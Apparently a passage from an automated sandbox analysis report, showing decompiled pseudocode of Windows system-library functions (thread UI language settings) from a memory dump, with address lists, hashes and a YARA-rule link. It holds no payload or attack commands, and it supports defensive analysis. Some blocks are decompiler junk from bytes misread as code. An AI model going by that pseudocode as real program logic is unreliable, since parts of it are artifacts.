										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t301 = _v56;
								if(_v56 != 0) {
									_t342 =  &_v36;
									_t303 = E01912E3E(_t301,  &_v36);
									_t315 = _v36;
									_v76 = _t303;
								}
								if(_t315 == 0) {
									goto L44;
								} else {
									_t305 = _t305 + 2 + _t315;
								}
								goto L14;
							case 6:
								__eax =  *0x19d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x19d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x19d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x19d6e58 & 0x0000ffff;
								__eax = ( *0x19d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t353 = _t353 + 1;
								if(_t353 >= _v48) {
									goto L16;
								} else {
									_t342 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t320 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *((intOrPtr*)(_t360 + 0x28)) =  *((intOrPtr*)(_t360 + 0x28)) + _t373;
					asm("daa");
					 *_t360 =  *_t360 + _t366;
					_t263 = _t258 + _t373;
					 *((intOrPtr*)(_t360 + 0x28)) =  *((intOrPtr*)(_t360 + 0x28)) + _t263;
					_t264 = _t320;
					_t325 = _t263;
					 *0x1f019126 =  *0x1f019126 + _t264;
					_pop(_t310);
					_t265 = _t366;
					 *((intOrPtr*)(_t265 +  &_a1530200461)) =  *((intOrPtr*)(_t265 +  &_a1530200461)) + _t342;
					_t266 = _t264;
					 *_t342 =  *_t342 + _t266;
					 *((intOrPtr*)(_t325 - 0x6ed77fff)) =  *((intOrPtr*)(_t325 - 0x6ed77fff)) - _t342;
					_t363 = _t360 + _t360;
					asm("daa");
					 *_t363 =  *_t363 + _t310;
					 *((intOrPtr*)(_t266 - 0x6ed7b1ff)) =  *((intOrPtr*)(_t266 - 0x6ed7b1ff)) - _t342;
					_a35 = _a35 + _t310;
					_pop(_t311);
					 *((intOrPtr*)(_t265 +  &_a1546912141)) =  *((intOrPtr*)(_t265 +  &_a1546912141)) + _t363;
					_t375 = _t373 + _t325;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x19bff00);
					E0193D08C(_t311, _t355, _t363);
					_v44 =  *[fs:0x18];
					_t356 = 0;
					 *_a24 = 0;
					_t312 = _a12;
					__eflags = _t312;
					if(_t312 == 0) {
						_t274 = 0xc0000100;
					} else {
						_v8 = 0;
						_t364 = 0xc0000100;
						_v52 = 0xc0000100;
						_t276 = 4;
						while(1) {
							_v40 = _t276;
							__eflags = _t276;
							if(_t276 == 0) {
								break;
							}
							_t332 = _t276 * 0xc;
							_v48 = _t332;
							__eflags = _t312 -  *((intOrPtr*)(_t332 + 0x18c1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t291 = E0192E5C0(_a8,  *((intOrPtr*)(_t332 + 0x18c1668)), _t312);
									_t375 = _t375 + 0xc;
									__eflags = _t291;
									if(__eflags == 0) {
										_t364 = E019651BE(_t312,  *((intOrPtr*)(_v48 + 0x18c166c)), _a16, _t356, _t364, __eflags, _a20, _a24);
										_v52 = _t364;
										break;
									} else {
										_t276 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t276 = _t276 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t364;
						__eflags = _t364;
						if(_t364 < 0) {
							__eflags = _t364 - 0xc0000100;
							if(_t364 == 0xc0000100) {
								_t328 = _a4;
								__eflags = _t328;
								if(_t328 != 0) {
									_v36 = _t328;
									__eflags =  *_t328 - _t356;
									if( *_t328 == _t356) {
										_t364 = 0xc0000100;
										goto L76;
									} else {
										_t344 =  *((intOrPtr*)(_v44 + 0x30));
										_t278 =  *((intOrPtr*)(_t344 + 0x10));
										__eflags =  *((intOrPtr*)(_t278 + 0x48)) - _t328;
										if( *((intOrPtr*)(_t278 + 0x48)) == _t328) {
											__eflags =  *(_t344 + 0x1c);
											if( *(_t344 + 0x1c) == 0) {
												L106:
												_t364 = E01912AE4( &_v36, _a8, _t312, _a16, _a20, _a24);
												_v32 = _t364;
												__eflags = _t364 - 0xc0000100;
												if(_t364 != 0xc0000100) {
													goto L69;
												} else {
													_t356 = 1;
													_t328 = _v36;
													goto L75;
												}
											} else {
												_t281 = E018F6600( *(_t344 + 0x1c));
												__eflags = _t281;
												if(_t281 != 0) {
													goto L106;
												} else {
													_t328 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t364 = E01912C50(_t328, _a8, _t312, _a16, _a20, _a24, _t356);
											L76:
											_v32 = _t364;
											goto L69;
										}
									}
									goto L108;
								} else {
									E018FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t364 = _a24;
									_t288 = E01912AE4( &_v36, _a8, _t312, _a16, _a20, _t364);
									_v32 = _t288;
									__eflags = _t288 - 0xc0000100;
									if(_t288 == 0xc0000100) {
										_v32 = E01912C50(_v36, _a8, _t312, _a16, _a20, _t364, 1);
									}
									_v8 = _t356;
									E01912ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t274 = _t364;
					}
					L70:
					return E0193D0D1(_t274);
				}
				L108:
			}


























































                                              0x01912584
                                              0x01912586
                                              0x01912590
                                              0x01912596
                                              0x01912597
                                              0x01912598
                                              0x01912599
                                              0x0191259e
                                              0x019125a4
                                              0x019125a9
                                              0x019125ac
                                              0x019125ae
                                              0x019125b1
                                              0x019125b2
                                              0x019125b5
                                              0x019125b8
                                              0x019125bb
                                              0x019125bc
                                              0x019125bf
                                              0x019125c2
                                              0x019125c5
                                              0x019125c6
                                              0x019125cb
                                              0x019125ce
                                              0x019125d8
                                              0x019125dd
                                              0x019125de
                                              0x019125e1
                                              0x019125e3
                                              0x019125e9
                                              0x019126da
                                              0x019126da
                                              0x019126dd
                                              0x019126e2
                                              0x01955b56
                                              0x00000000
                                              0x019126e8
                                              0x019126f9
                                              0x019126fb
                                              0x019126fe
                                              0x01912700
                                              0x01955b60
                                              0x00000000
                                              0x01912706
                                              0x01912706
                                              0x0191270a
                                              0x0191270a
                                              0x0191270d
                                              0x01912713
                                              0x01912716
                                              0x01912718
                                              0x0191271c
                                              0x0191271e
                                              0x01955b6c
                                              0x01955b6f
                                              0x01955b7f
                                              0x01955b89
                                              0x01955b8e
                                              0x01955b93
                                              0x01955b96
                                              0x01955b9c
                                              0x01955ba0
                                              0x01955ba3
                                              0x01955bab
                                              0x01955bb0
                                              0x01955bb3
                                              0x01955bb3
                                              0x01955ba3
                                              0x01912724
                                              0x01912726
                                              0x01912729
                                              0x0191272c
                                              0x0191279d
                                              0x0191279d
                                              0x019127a0
                                              0x019127a2
                                              0x00000000
                                              0x0191272e
                                              0x0191272e
                                              0x01912731
                                              0x01912734
                                              0x01912734
                                              0x01912736
                                              0x01955bc1
                                              0x01955bc1
                                              0x01955bc4
                                              0x00000000
                                              0x01955bca
                                              0x01955bca
                                              0x01955bcd
                                              0x00000000
                                              0x01955bd3
                                              0x00000000
                                              0x01955bd3
                                              0x01955bcd
                                              0x0191273c
                                              0x0191273c
                                              0x01912742
                                              0x01912747
                                              0x0191274a
                                              0x0191274d
                                              0x01912750
                                              0x00000000
                                              0x01912756
                                              0x01912756
                                              0x00000000
                                              0x01912902
                                              0x01912908
                                              0x0191290b
                                              0x00000000
                                              0x01912911
                                              0x0191291c
                                              0x01912921
                                              0x00000000
                                              0x01912921
                                              0x00000000
                                              0x00000000
                                              0x01912880
                                              0x01912887
                                              0x0191288c
                                              0x00000000
                                              0x00000000
                                              0x01912805
                                              0x0191280a
                                              0x01912814
                                              0x01912816
                                              0x00000000
                                              0x00000000
                                              0x0191281e
                                              0x01912821
                                              0x01912823
                                              0x00000000
                                              0x01912829
                                              0x01912829
                                              0x01912831
                                              0x0191283c
                                              0x0191283e
                                              0x00000000
                                              0x0191283e
                                              0x00000000
                                              0x00000000
                                              0x0191284e
                                              0x01912850
                                              0x01912851
                                              0x01912854
                                              0x01912857
                                              0x0191285a
                                              0x0191285c
                                              0x0191285d
                                              0x00000000
                                              0x00000000
                                              0x0191275d
                                              0x01912761
                                              0x00000000
                                              0x01912767
                                              0x0191276e
                                              0x01912773
                                              0x01912773
                                              0x01912776
                                              0x01912778
                                              0x0191277e
                                              0x0191277e
                                              0x01912781
                                              0x01912781
                                              0x01912783
                                              0x01912784
                                              0x00000000
                                              0x00000000
                                              0x01955bd8
                                              0x01955bde
                                              0x01955be4
                                              0x01955be6
                                              0x01955be8
                                              0x01955be9
                                              0x01955bee
                                              0x01955bf8
                                              0x01955bff
                                              0x01955c01
                                              0x01955c04
                                              0x01955c07
                                              0x01955c0b
                                              0x01955c0d
                                              0x01955c0d
                                              0x01955c15
                                              0x01955c18
                                              0x01955c1b
                                              0x01955c1b
                                              0x01955c1e
                                              0x00000000
                                              0x00000000
                                              0x019128c3
                                              0x019128c8
                                              0x019128d2
                                              0x019128d4
                                              0x019128d8
                                              0x019128db
                                              0x01955c26
                                              0x01955c28
                                              0x01955c2d
                                              0x01955c2d
                                              0x00000000
                                              0x00000000
                                              0x01955c34
                                              0x01955c36
                                              0x01955c49
                                              0x01955c4e
                                              0x01955c54
                                              0x01955c5b
                                              0x01955c5d
                                              0x01955c60
                                              0x01912788
                                              0x01912788
                                              0x0191278b
                                              0x0191278e
                                              0x0191278e
                                              0x0191278e
                                              0x01912791
                                              0x00000000
                                              0x00000000
                                              0x01912756
                                              0x01912750
                                              0x00000000
                                              0x01912794
                                              0x01912794
                                              0x01912795
                                              0x01912798
                                              0x01912798
                                              0x00000000
                                              0x01912734
                                              0x0191272c
                                              0x01912700
                                              0x019125ef
                                              0x019125ef
                                              0x019125ef
                                              0x019125f2
                                              0x019125f8
                                              0x00000000
                                              0x00000000
                                              0x019125fe
                                              0x00000000
                                              0x019128e6
                                              0x019128ec
                                              0x019128ef
                                              0x019128f5
                                              0x019128f8
                                              0x019128f8
                                              0x00000000
                                              0x019128f8
                                              0x00000000
                                              0x00000000
                                              0x01912866
                                              0x01912866
                                              0x01912876
                                              0x01912879
                                              0x00000000
                                              0x00000000
                                              0x019127e0
                                              0x019127e7
                                              0x019127e9
                                              0x019127eb
                                              0x01955afd
                                              0x00000000
                                              0x01955afd
                                              0x00000000
                                              0x00000000
                                              0x01912633
                                              0x01912638
                                              0x0191263b
                                              0x0191263c
                                              0x0191263e
                                              0x01912640
                                              0x01912642
                                              0x01912647
                                              0x01912649
                                              0x0191264e
                                              0x01912650
                                              0x01912653
                                              0x01912659
                                              0x019126a2
                                              0x019126a7
                                              0x019126ac
                                              0x019126b2
                                              0x01955b11
                                              0x01955b15
                                              0x01955b17
                                              0x00000000
                                              0x019126b8
                                              0x019126b8
                                              0x019126ba
                                              0x019127a6
                                              0x019127a6
                                              0x019127a9
                                              0x019127ab
                                              0x019127b9
                                              0x019127b9
                                              0x019127be
                                              0x019127c1
                                              0x019127c3
                                              0x019127c5
                                              0x019127c7
                                              0x01955c74
                                              0x01955c79
                                              0x01955c79
                                              0x019127c7
                                              0x00000000
                                              0x019126c0
                                              0x019126c0
                                              0x019126c3
                                              0x019126c6
                                              0x019126c6
                                              0x019126c9
                                              0x019126c9
                                              0x00000000
                                              0x019126c9
                                              0x019126ba
                                              0x0191265b
                                              0x0191265b
                                              0x0191265e
                                              0x01912667
                                              0x0191266d
                                              0x01912677
                                              0x0191267c
                                              0x0191267f
                                              0x01912681
                                              0x01955b49
                                              0x01955b4e
                                              0x019127cd
                                              0x019127d0
                                              0x019127d1
                                              0x019127d2
                                              0x019127d4
                                              0x019127dd
                                              0x01912687
                                              0x01912687
                                              0x0191268a
                                              0x0191268b
                                              0x0191268e
                                              0x0191268f
                                              0x01912691
                                              0x01912696
                                              0x01912698
                                              0x0191269d
                                              0x0191269f
                                              0x00000000
                                              0x0191269f
                                              0x01912681
                                              0x00000000
                                              0x00000000
                                              0x01912846
                                              0x00000000
                                              0x00000000
                                              0x01912605
                                              0x0191260a
                                              0x0191260c
                                              0x01912611
                                              0x01912616
                                              0x01912619
                                              0x01912619
                                              0x0191261e
                                              0x00000000
                                              0x01912624
                                              0x01912627
                                              0x01912627
                                              0x00000000
                                              0x00000000
                                              0x01955b1f
                                              0x00000000
                                              0x00000000
                                              0x01912894
                                              0x0191289b
                                              0x0191289d
                                              0x019128a1
                                              0x01955b2b
                                              0x01955b2e
                                              0x01955b2e
                                              0x019128a7
                                              0x019128a9
                                              0x01955b04
                                              0x01955b09
                                              0x01955b09
                                              0x01955b09
                                              0x00000000
                                              0x00000000
                                              0x01955b35
                                              0x01955b3c
                                              0x019128fb
                                              0x019128fb
                                              0x019126cc
                                              0x019126cc
                                              0x019126d0
                                              0x00000000
                                              0x019126d2
                                              0x019126d2
                                              0x00000000
                                              0x019126d2
                                              0x00000000
                                              0x00000000
                                              0x019125fe
                                              0x0191292d
                                              0x0191292f
                                              0x01912930
                                              0x01912935
                                              0x01912938
                                              0x0191293e
                                              0x01912940
                                              0x01912942
                                              0x01912944
                                              0x01912947
                                              0x01912947
                                              0x01912948
                                              0x0191294e
                                              0x0191294f
                                              0x01912950
                                              0x01912957
                                              0x01912958
                                              0x0191295a
                                              0x01912960
                                              0x01912962
                                              0x01912964
                                              0x01912966
                                              0x0191296c
                                              0x01912972
                                              0x01912974
                                              0x0191297c
                                              0x0191297e
                                              0x0191297f
                                              0x01912980
                                              0x01912981
                                              0x01912982
                                              0x01912983
                                              0x01912984
                                              0x01912985
                                              0x01912986
                                              0x01912987
                                              0x01912988
                                              0x01912989
                                              0x0191298a
                                              0x0191298b
                                              0x0191298c
                                              0x0191298d
                                              0x0191298e
                                              0x0191298f
                                              0x01912990
                                              0x01912992
                                              0x01912997
                                              0x019129a3
                                              0x019129a6
                                              0x019129ab
                                              0x019129ad
                                              0x019129b0
                                              0x019129b2
                                              0x01955c80
                                              0x019129b8
                                              0x019129b8
                                              0x019129bb
                                              0x019129c0
                                              0x019129c5
                                              0x019129c6
                                              0x019129c6
                                              0x019129c9
                                              0x019129cb
                                              0x00000000
                                              0x00000000
                                              0x019129cd
                                              0x019129d0
                                              0x019129d9
                                              0x019129db
                                              0x019129dd
                                              0x01912a7f
                                              0x01912a84
                                              0x01912a87
                                              0x01912a89
                                              0x01955ca1
                                              0x01955ca3
                                              0x00000000
                                              0x01912a8f
                                              0x01912a8f
                                              0x00000000
                                              0x01912a8f
                                              0x00000000
                                              0x019129e3
                                              0x019129e3
                                              0x019129e3
                                              0x00000000
                                              0x019129e3
                                              0x019129dd
                                              0x00000000
                                              0x019129db
                                              0x019129e6
                                              0x019129e9
                                              0x019129eb
                                              0x019129ed
                                              0x019129f3
                                              0x019129f5
                                              0x019129f8
                                              0x019129fa
                                              0x01912a97
                                              0x01912a9a
                                              0x01912a9d
                                              0x01912add
                                              0x00000000
                                              0x01912a9f
                                              0x01912aa2
                                              0x01912aa5
                                              0x01912aa8
                                              0x01912aab
                                              0x01955cab
                                              0x01955caf
                                              0x01955cc5
                                              0x01955cda
                                              0x01955cdc
                                              0x01955cdf
                                              0x01955ce5
                                              0x00000000
                                              0x01955ceb
                                              0x01955ced
                                              0x01955cee
                                              0x00000000
                                              0x01955cee
                                              0x01955cb1
                                              0x01955cb4
                                              0x01955cb9
                                              0x01955cbb
                                              0x00000000
                                              0x01955cbd
                                              0x01955cbd
                                              0x00000000
                                              0x01955cbd
                                              0x01955cbb
                                              0x01912ab1
                                              0x01912ab1
                                              0x01912ac4
                                              0x01912ac6
                                              0x01912ac6
                                              0x00000000
                                              0x01912ac6
                                              0x01912aab
                                              0x00000000
                                              0x01912a00
                                              0x01912a09
                                              0x01912a0e
                                              0x01912a21
                                              0x01912a24
                                              0x01912a35
                                              0x01912a3a
                                              0x01912a3d
                                              0x01912a42
                                              0x01912a59
                                              0x01912a59
                                              0x01912a5c
                                              0x01912a5f
                                              0x01912a5f
                                              0x019129fa
                                              0x019129f3
                                              0x01912a64
                                              0x01912a64
                                              0x01912a6b
                                              0x01912a6b
                                              0x01912a6d
                                              0x01912a72
                                              0x01912a72
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: PATH
                                              • API String ID: 0-1036084923
                                              • Opcode ID: f28aa0d71cd70959e766bb9489c60a90e7cc48bbb951cc04126fa9f772cafafe
                                              • Instruction ID: dbf95d760dc5feed9ef1df4068e5182907fc5bcf5a52a0639845f21fae2a1479
                                              • Opcode Fuzzy Hash: f28aa0d71cd70959e766bb9489c60a90e7cc48bbb951cc04126fa9f772cafafe
                                              • Instruction Fuzzy Hash: 1DC1B371E00219DFDB25EF99D880BBEBBB5FF48740F244429E909BB254D734A981CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0191FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E0191FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E018FEEF0(0x19d7b60);
					_t134 =  *0x19d7b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x19d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x19d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E018F6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E018F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01988938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E018EB150();
													}
													_t116 = E01986D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018F75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x19d8638; // 0x0
																	_t122 = L018F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E018F76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E018F76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0191FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0191FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0191FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0191FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0191FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0191FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x19d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x19d7b84 = _t75;
						_t73 = E018FEB70(_t134, 0x19d7b60);
						if( *0x19d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E018FFF60( *0x19d7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                              0x0191fab0
                                              0x0191fab2
                                              0x0191fab3
                                              0x0191fab4
                                              0x0191fabc
                                              0x0191fac0
                                              0x0191fb14
                                              0x0191fb17
                                              0x0191fac2
                                              0x0191fac8
                                              0x0191facd
                                              0x0191fad3
                                              0x0191fad3
                                              0x0191fadd
                                              0x0191fb18
                                              0x0191fb1b
                                              0x0191fb1d
                                              0x0191fb1e
                                              0x0191fb1f
                                              0x0191fb20
                                              0x0191fb21
                                              0x0191fb22
                                              0x0191fb23
                                              0x0191fb24
                                              0x0191fb25
                                              0x0191fb26
                                              0x0191fb27
                                              0x0191fb28
                                              0x0191fb29
                                              0x0191fb2a
                                              0x0191fb2b
                                              0x0191fb2c
                                              0x0191fb2d
                                              0x0191fb2e
                                              0x0191fb2f
                                              0x0191fb3a
                                              0x0191fb3b
                                              0x0191fb3e
                                              0x0191fb41
                                              0x0191fb44
                                              0x0191fb47
                                              0x0191fb4a
                                              0x0191fb4d
                                              0x0191fb53
                                              0x0195bdcb
                                              0x0195bdcb
                                              0x0191fb59
                                              0x0191fb5b
                                              0x0191fb5b
                                              0x0191fb5e
                                              0x0195bdd5
                                              0x0195bdd8
                                              0x00000000
                                              0x0195bdda
                                              0x00000000
                                              0x0195bdda
                                              0x0191fb64
                                              0x0191fb64
                                              0x0191fb64
                                              0x0191fb67
                                              0x0191fb6e
                                              0x0191fb70
                                              0x0191fb72
                                              0x00000000
                                              0x0191fb78
                                              0x0191fb7a
                                              0x0191fb7a
                                              0x0191fb7d
                                              0x0191fb80
                                              0x0195bddf
                                              0x0195bde1
                                              0x00000000
                                              0x0195bde3
                                              0x00000000
                                              0x0195bde3
                                              0x0191fb86
                                              0x0191fb86
                                              0x0191fb86
                                              0x0191fb8b
                                              0x0191fb90
                                              0x0191fb92
                                              0x0191fb94
                                              0x0191fb9a
                                              0x0191fb9b
                                              0x0191fba1
                                              0x0195bde8
                                              0x0195bdeb
                                              0x0195bded
                                              0x0195beb5
                                              0x0195beb5
                                              0x0195bebb
                                              0x0195bebd
                                              0x0195bec3
                                              0x0195bed2
                                              0x0195bedd
                                              0x0195bedd
                                              0x0195beed
                                              0x00000000
                                              0x0195bdf3
                                              0x0195bdfe
                                              0x0195be06
                                              0x0195be0b
                                              0x0195be0d
                                              0x0195be0f
                                              0x0195be14
                                              0x0195be19
                                              0x0195be20
                                              0x0195be25
                                              0x0195be27
                                              0x0195be35
                                              0x0195be39
                                              0x0195be46
                                              0x0195be4f
                                              0x0195be54
                                              0x0195be56
                                              0x0195bef8
                                              0x0195bef8
                                              0x00000000
                                              0x0195be5c
                                              0x0195be5c
                                              0x0195be60
                                              0x00000000
                                              0x0195be66
                                              0x0195be66
                                              0x0195be7f
                                              0x0195be84
                                              0x0195be87
                                              0x0195be89
                                              0x0195be8b
                                              0x0195be99
                                              0x0195be9d
                                              0x0195bea0
